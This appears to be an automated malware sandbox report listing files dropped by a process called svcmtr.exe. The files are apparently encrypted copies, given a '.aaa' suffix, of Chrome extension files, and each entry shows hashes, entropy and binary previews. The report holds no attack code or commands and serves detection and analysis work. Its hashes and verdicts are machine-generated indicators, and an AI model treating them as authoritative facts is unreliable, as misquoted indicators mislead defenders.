                                                                                                                          SSDEEP:96:cztoDt6QcuF+ChoiyHf/xLahSQcBNg3fYTt4GdFabPFNEaPxZT:GopyCwHfZW8CKeGd6DbTT
                                                                                                                          MD5:32007FC6DEF4D91E8E4A8880092CB3CD
                                                                                                                          SHA1:29C1F3F6965CE41A9D858C6A231D0BA9DCFA6FE0
                                                                                                                          SHA-256:445D5310758FF9CF500BDCA539F3F4EC379CB38EA4AF135AF4F103834EB4D425
                                                                                                                          SHA-512:5CD44AF5078449B63689F0B2452BCBF037321AD502403D09E5B4B0A8FDF1C3C16CC16E072B827434ABE62204366A47FEAE19E6C4A2DF634AC8D4FE9EC0685205
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......'h.~.#..XD...&.....S.^.....,\..C...y...1b.....*..]..;T..%.R>g..c.....gLg9......G........'......k{.c.a...st.:[.....>.G.?...g...n.....#....................+1.ib..t.{P....9..F..w.:zG.v={P,.. .)..6.\,........tr..bp..ad.. ......@..D...|..nI.j.W".H.3C....oPw.. ..9.n......8.us.?.s.o......]..)...G@.U...I.r....%.r..4A..<.j..=e...?/I.@eHr2/....J..DMr_NLFEA..3a..[...%..|Y......Y..i9.7....)]...J'M..f(^[.`..E....3*.....I.:.:.b].O1=o......./..7DqT..j.y../.B........a..m...+.I....tq..*.+.|V3.g5..[...........^..j......C...v..a....."|.).i6.J/...l..D(h....0.._g.B..Q;0.D.(

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\main.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510
                                                                                                                          Entropy (8bit):6.396937783387186
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2/do+2EMbsEdGhb:c+z5U4a8OoDUX+S2VZYbs
                                                                                                                          MD5:63C966270D0FB0A01400A8F2EE3E1D7F
                                                                                                                          SHA1:F7D3B131E375BA9B60687FA85FCD1949FF6687D4
                                                                                                                          SHA-256:12F455C43E417B3250E48E8930D56478BE5B9C73E238BECB82523E607AFF71FD
                                                                                                                          SHA-512:45442A5914B01223159FC330C08D145A32FA08F46396D2A172D24DABF67EC3BEED70A7F00CF5E93E7B4AAB1E337630CB2C25BF2A9FEDA6FB6958A8F8126E4657
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......Je...r.y..._...D.b.l.y....[...(..Jo*Z,.f..a...Z0j.-%..O7!......p....];..4.=....8x........q.....}.^.N(

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\128.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2430
                                                                                                                          Entropy (8bit):7.842174024715984
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgZyqGo7njjm6UmPEaMxnQaCxMxJ0/MfDsFJRkB8uqg1T:cztoD2yqGo7n3m6Um0QaCwGIDbqg1T
                                                                                                                          MD5:15C0913F0899166B573B11B6D45B353C
                                                                                                                          SHA1:1D04B656D6D782A88201A044F7EA732819D25FE4
                                                                                                                          SHA-256:84B1363506860BEAF0B99BB8C7B3E2A1BCFFDCBC24B0936795C6AD6D4C36A113
                                                                                                                          SHA-512:BB08F9086D087D224A86DF86EEE6210BEEA57930D8F849C3F7F0E6BAA80C6C1BDE6A23B68B8F70CF208BBB7EBD72895D7C05BD6B82E84E5583AA6BD98ECEE038
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....Z......Bb........;F..<t.4..WP.....&K.e...."|>@..V!H4.wM;.l.g_..B....z......:8MN.Ba.uX..B.o..:~.1...<.].9.b.J.3...q..x.....Wz.......r........d6<',..D....?0..k...J.]...3[.S.RrqBu.w.X.=W.v.4.(.h*..$..x......3=..........h....XH.)v....`.yV..s.s._..Y...u.........1...vq..M.h..m.Bf.d.X....ed...l..8...~..WO..<+.....S;.m [...W'..&.I....d..>:..Aa.....Xm...U...n...SjC.#......2.64c......IQ..iZ...<..T.K..no,,...'.d:..a...z.:U.....C.. V....xv..N.c8J..@HmK.!.5.T[......VX...mS={z8..S...Y..R.m+.T.lF._.T..M..e..|...r^.)LNE#.i....f*..;...=)A.........}..X..{.b........|Q..e...i...y.SW.l.5.v.W.

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.47.0\LICENSE.txt.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25454
                                                                                                                          Entropy (8bit):7.99227459143512
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GFrzczxXSCB4SdMQyhIn6gYRWCxo46KwqPz:areSpSdWhWwPxoVKL
                                                                                                                          MD5:E6ABD7C9E18AFE67432BB48B310EBD63
                                                                                                                          SHA1:EA9B4C3C30FF4E3A65999926B66B522411F9E12A
                                                                                                                          SHA-256:714A564B35C4153EC563919FAF68C3109F6D5E3B256C48E85E780A425B7B10E2
                                                                                                                          SHA-512:F82F71BBCECCECCBCF58593D8233DB95D5CF044CADDB120E94408778BF059F9DA3B366B85D84D18ED6A40F56FEFBEE79E218121F564FC2E8CD52C5F1551C0F79
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......D.i=....6#..a...5sQ.a..j,k@....X...n.....[.>S...+m..5t....i...|....~.y.....6...&...........B.;./........%.97.|O.k.(... yw...I...4Rm..U.^.w.1...u....3B..U+..<..Uy?..'3.{1....Qo@.C.....k.!Ml).M......|:....~<9.........I..r.c...s5.....Do....t.b.;...F..,L..gn........U#".....q..b$....5...J..c.d.A..<WU.oH.&..p....Z2..s.,J..E..zO..K8..<...<...M.1.4..7.AV.7y..(8.{..e...)....z.%..0.8.6.... ..Z....LJ9..9.v[.>C..][....!L..N.r..z....L`..lh..FP...X_......K...-..3+.....A..9.t.N>..Gt.q...g.y.Eo...$...7.5.......h.[.#..,W...{v).V.....I.aXG.r...\.F{.y....w.x7]t%[..D./@1....V..n.a.Q..[.....

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_16.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.381670871302546
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2tPxXSirN6zQgqAYXoMT1ZFZLRctdPF:c+9U40oDgStSQwYXoMT1nkd
                                                                                                                          MD5:39F5E5BA97430224921BF865DCAE3DED
                                                                                                                          SHA1:830DB583B45B0FB8D5BAAAF7C7547EA21EEB6366
                                                                                                                          SHA-256:BFC74C08BF5F50948A157AF89AD3F962D2031555E0CAFC9F55C69C1A0E44BDB6
                                                                                                                          SHA-512:0B4D442711BA9464E62AA7B2E37D04232F60CCB9181267F1FF95547BC55EA1CDEC01D04C3CE13B1D1204145A94A0D6B645D777B54F3104731BEB0FAD9FC09B2B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......h.g.P,.`#KrN....$@....'.+.w.+AI!v..R..V.......EN&...$.h...*..8......7...........^...pJg.^E.L'{.N..6..Q.(n.@.....6..X.?.......s!..e.J..g..YMu...O=y.[.1.w......u...(/]....UT.9!1.U9.GU2.)G.+Ub.......>........&....0IX.i.G.w.n.g..\..`g..5%WB....f..4.be.\.=6.=Q.0..>....1`......7M....J...H..$|F'..S.ye2.Rg."P./\.Qh.v.N.....x........^E.C...`...`...z.|...........C.8...C.]..x4J.g.Y.[.e...2..j..,}..@..c...q3..^^.q..}(....+..|..u^..Hi...O....u>..6.`D..."a..%w.9h..9.,.*wg..k...w.d.TyB......../.9...c..u.i.!....lN..........=.".....x..9O.2......-..v@..]...n.......]7..

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):974
                                                                                                                          Entropy (8bit):7.359582985844575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2zAx7nv/X3rhK2Lbj893HM1a/B:c+9U40oDg/h54930a/B
                                                                                                                          MD5:3AEFA66DEC637FF66E0B51D9217230DE
                                                                                                                          SHA1:D2A4100685FF1E53C89E043EFF073BDE2F7157DB
                                                                                                                          SHA-256:FC6E6900B4AD8B7A07813E4CB6B76CC6B23C0AB497BBCFEE79DA234F8B8D36A4
                                                                                                                          SHA-512:D589CB93A000D3C4A89119AA05740127CE8D61C74EF6FF58710E849FB1BF602556488B0A250DEE71B1A4C16FF3B300A507D8AC2EFA73312419DE1E2DB2CA4C78
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...=.@.OT......5......*..hO...x...Q.h...{..Y..%i..KKn;.Y.X/.=.ak.l.E.\R._].<.o.JD.*......=...Fd...e..R..H......].#.......'V...6Uh.. ..n.nG.S......G......O..EG....s.iH..:sVA-.e.@..s..q4<&w..z1:....R..,.Dv......w7...gb. )h.....Mv.1R..Zbe...=0g...v{H.RP.....^..3...zQ..ox.&/-.......`..(.`.z..G....,..h....m...E.5..OW.@h..$...6........].W..e..h.<.d&h..#h3.<0=.*.`.7kg..]4./.}...A...?.......$..sCl.....U.CpF?=\.....KI^R.y6t.B...n.e^..|.;*.....&v..T~..7.<C...T$h.I%.8`.}u.....>.pAH..<Rt....{.K..^...Q`...P.I....>.N.>..G.Y.g=.7..W?.8.?.qr..*..F*...~..0.8.e...eC.k..

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4238
                                                                                                                          Entropy (8bit):7.911208594480593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoD0e/EVbBp7JXQc6zyi4jQEuSSTAeUqlwfuzAe05:GoAXBp7J8ybjQCSMwWIAf5
                                                                                                                          MD5:968FF9DB2147D42528980E43BCE6ED31
                                                                                                                          SHA1:72D6A7A9589FD89BB2DF3FDF6B5569A856B6A4EB
                                                                                                                          SHA-256:142781179EC36F5F985398FEA8DE4D425DA9E823F72C4C559937DD5A125B098C
                                                                                                                          SHA-512:55A72D01113D63992046510E08E432B45F4F64FBF8807983D7293E84B9B629342271F64BE359B48D4212940CD21618E02B617460B706B73EBA6FD08F6948A48E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.."......u.#.I...&....*./..".?x.l.(u.+.1u.....n....h.a.s>T[.._f./...)..km.v.(4......|&o...<U..{K.=..2Q....]..].....N.....o.[*..7t..2....L..W...m(...k.7.Ip ;j..KF.......XL..k?...GbzZ..(.}*.E..1....9....epY...}g..b.:..j...}.F...K.....hE.v..B..}g.8....Je6.....3yz.v.T............i."1...:.....:.......o. @chE.<....;...*..y.K..r..}sK.O.F..H....CQ>V......9.....W?iV.d.g."...X....%.9....F..........$v..eh./;M....t.J..){..UO....s..>.!.A@.^..)..>....u6~.c....c.b"...Z.[....z....X$U...<Pn.Y...9`...j...u....I....:e)....s...e(...N..P..'.s}..Bf...|X...]..=],.Q.O7...L.Dy4}.ktH/.8...bko....

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_128.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4238
                                                                                                                          Entropy (8bit):7.9223498801309375
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoD5yP8FfseiOCujWco0eAXkoa6m4BTZWHzu/HWupoi:GoV/FfJwWTo0eAXkaNBT0z42uSi
                                                                                                                          MD5:59D69FF28622B32C7A842E5AC6F9312A
                                                                                                                          SHA1:95151C22A60BE3A4C6D3C837060D1EEC0B05A376
                                                                                                                          SHA-256:0E996F84008C16EC8FB1EB80EDD27B0EA6076C072F6BBB91957F5B7E6135F762
                                                                                                                          SHA-512:C7591276042E344EB6AB1712A2A680EFB2017DC7D65B3E8B8ECDB1886EA16F239A2EE6763BF66D07526F3A9A96459015DC839B58C77BC409DF863C9395968472
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...*...<.._....ki.....j....gAD...F.....cu.G..0Qx/$.WrF..AI.4..2.vU.lw.J ....../....PY.S?.........a.Q.=......."...Tz..[..J).......E...d*..f.b....<...\.Q.`/..d...zg.?JU.O.g.....N......O.|.t:.q...KQI.....n..^...4U[..=Q.....q..C.5p..B.....k...h...@*....v"...Q......[...3l.h............-......IQL.V.qz..e......E.C....C.2.'.i.4s..x..ENeok...h"]..".^YP..z./.w...E.O.H.....(\r.O(.....p....E1...@<*....A.D..VO..=s...G......H..}=u..Q..[..@..F@.].#...zU./..U?..+W0>...p.Ea/D..?...t.".Zx>U_-e...4.P.~.9v.#...3...g.".J h.-T..*a./.......@..Nkn..Hi.#$!.m.>.J!.v.<^n.$.B.[{G....~.e...l.=......n.

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_16.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):990
                                                                                                                          Entropy (8bit):7.371744844825426
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2ZU1yuD186wDPTsR9FuEbSuJc7Agc:c+9U40oDgfRpbSuEc
                                                                                                                          MD5:136B58C027AC4D70326E2BEBC260BFD5
                                                                                                                          SHA1:6E02C5567EFBBE3BCA9347850FA9F7965DB854B2
                                                                                                                          SHA-256:52899A444C10BE917910AB50F158BF77E286C02034E4FC3AD7B291A94A51C1C2
                                                                                                                          SHA-512:65E82D38DF126AE9A9144CDB521415C14CA870620DA8CE24AE7674FF30415317B423C712D7726C850F5AB8E2F0AFB81F4248CDDA401F274D4682020CF031E85B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....Ehr..Z...lf.0>...8g..d.........[_{Q8.g..n..n..6s.....P.0..p..#....b...a+9..f&{.W.....K./..3.-...e.].+........8.-.o...{.'...2...........z.._._.q.i..7$.A.2.bG}.../)..Z..._7a.x.c..9be..~.^..^ J9.]......F 9.........N.&h,..K....7S....-.e.z.....n...}.......T/qJm.K.....H 5.. ...df&...a..Ca...}Z..n_.pZ.....y..-..5..\Gn(55wE....)..x.6.F.p..9..D.i}..UV...\_[.........Y..3Jw..a.X....B:...;;.yO......'\\......../....Wi.q.o.-.....N.......9.Vs.....'t...Vk..,n...N..[#.#..7.'>:..UR..c..#1.T_....v...rh.PQ.F..Z,....Y..<.sU.D...B#........@U...ia.>.ie.............p....@.......Ut

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\128.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5822
                                                                                                                          Entropy (8bit):7.956827028163817
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoD0fN3xUVWGtI/AFvX1kRTKOLL0mcwW3kCvFLnqLYN8GHsnMuU8IwdB:Goo+VWGtZFsTKoO+yFLCtEsMprwb
                                                                                                                          MD5:754DF98ED3768CEF2A59ABA82A34C6AB
                                                                                                                          SHA1:3E0C6369B74EE53137649EC991DFE7E83A27F207
                                                                                                                          SHA-256:772FE191610850FA7D9E47279247C7FD0EA91959CB1DBBFAA153D481BD17982C
                                                                                                                          SHA-512:1C4593B84E7114EFD98B1D46884454A360ED1BD7AF5D5AF158570FC1068F357C93899DC5240EEF5219EB976D3BB2E3E9D7631B2900C8D0FEDEF549F5A9B9377D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..L..b23-.azq..3......+A4.+... ."$:J.*..{w..%i[..J../mmr....H......7#.X.].U._...........S4..H.1:)..{G.e.cb#<\t.......e......+.UO..+..W..5....Z."8|[1.<...T...........!*i.#..y..{...@.5.......49...{F...<.e6.}y(.n.6rbR...K.e.>.E..eZ..8p..........J..........(..D.u...W..._....R.....eL.....`.^...)..I..R7.fR{hs'-..-...Q.X)...i"...e....w.^..b.....sLG.t..ne...o.t.....j.g.5.q)....iN.... .....a...5K..@..O.g.......0.P..g.\T....k....-f.E./iA..F.Y..Y."..[.\f.......ZiE .U...6.....r.gq.\=ID....-...')..^3}R...?.&g..%...a.......T% ...'i.K.R\.....@d.f..&G..w....H.u..4.Y..ZML.2..He....

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):590
                                                                                                                          Entropy (8bit):6.700207039453219
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2OtYxrGXBevd560VjoHC4iIO1:c+z5U4a8OoDUX+S2OWvFRzIO1
                                                                                                                          MD5:7C83E63392508AAC66FE0E383D7DCE1C
                                                                                                                          SHA1:8128CCFE6C40DEEDA4B444DBA8759864AC40D6DA
                                                                                                                          SHA-256:87E28D7B9212B33D4F4E76B20028FFEC43D0859C3AA691B9BE4AC4A7F0AA9FA8
                                                                                                                          SHA-512:C2EA519A8B578D26C0FAADF42C3FC55B2DFF83314DB0AAE87F5F7F938B2DC713385D3DF73627A3613F60B7DF08DFE53595ABE1B9DE8538446EA45AAE3FD543CD
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..I9.AP.2........4.....tA.j...%.....$...M._..M..ys..`..~..[\D.R..-.......h..d....1....1.Z.,L<Y.......)6.m'.z.^......QM..._....+3..R......c.R.H.(....m.:i...S7...].<7.OG.e..x.a.....f.+..Ve..(..W.

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1086
                                                                                                                          Entropy (8bit):7.488693678598227
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2CAAsmswIKi8nlM1kpMx7e8JSnMpsIr141dQ8:c+9U40oDgxAQ8alrpS7hJSosIS1dN
                                                                                                                          MD5:CF52B686D4DE13AD25F3525EA9A3E358
                                                                                                                          SHA1:05CE55497495AEEB3053C55A4CEEBE71CB6AFB8C
                                                                                                                          SHA-256:BE88E3D2BD8513AFD210D12F8FD6F9E89FB92E11A23FCD148E8E6E58073C4E93
                                                                                                                          SHA-512:78A16C35CC4BBBD374C8D66846AE3421FA06E985DEA5D14D2F40B481CAD3D8C0BEF8871C108D86A99D6A9ACD8944DB5A01A8E219E56A44AD1CACCD0F049DF5AD
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.. ....7.......o.O.....*......9.0<...b....^.N.....D..df..M...>.8..E]..P.<..X..X..._v^...H..."/K...r..<.~..U?.G..jYA..qMo.].....s@..M).".[.DU.>@.Z....Fz%.b.(+....6...'..=.b.........@}...c.XA..&Ipg@...<kOv....r........Cr..V.:N{...c.M. .j..d}.P.......Y=..\........`..N...G.]qu........m<......F/L3G....0......e..T.q.......>...P:3.......~wX..%2YE.:r...8@.....&y.oS-...8.F.}...........&.[...U!4....&1.|zl.<.zH...`K..Z..Y..C.....uN.8..T.....9%G..q#.;b^A.a.|2D7.Z....i......-!'....1E[f.`.9..].......... *...(.......eD1....(<-...<..`q(.f...k....Itm..J..*..%9..j..2...,a..(....

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.380851703458764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2jhtrPk6aubiqSRc+RfvUOWmsz1mj:c+9U40oDgUfaub/+0Oqmj
                                                                                                                          MD5:05F94BAAE206FD34B044AABCABE99441
                                                                                                                          SHA1:68050D025B505319020E12DC1D9470AE7CC2F178
                                                                                                                          SHA-256:BCFF2B3EB1144A3007B84696C940A4AB441F5F063CDC73F4F30B1F7AC79D89A8
                                                                                                                          SHA-512:F3E1265B493FAAA34C32431BFFF99F81428F7E9BC8B2137932D42B0D9CC5F563F8CC3A5924A07C4DE58C71E5632656068C75409EA8854E045134CBCFDF005165
                                                                                                                          Malicious:false
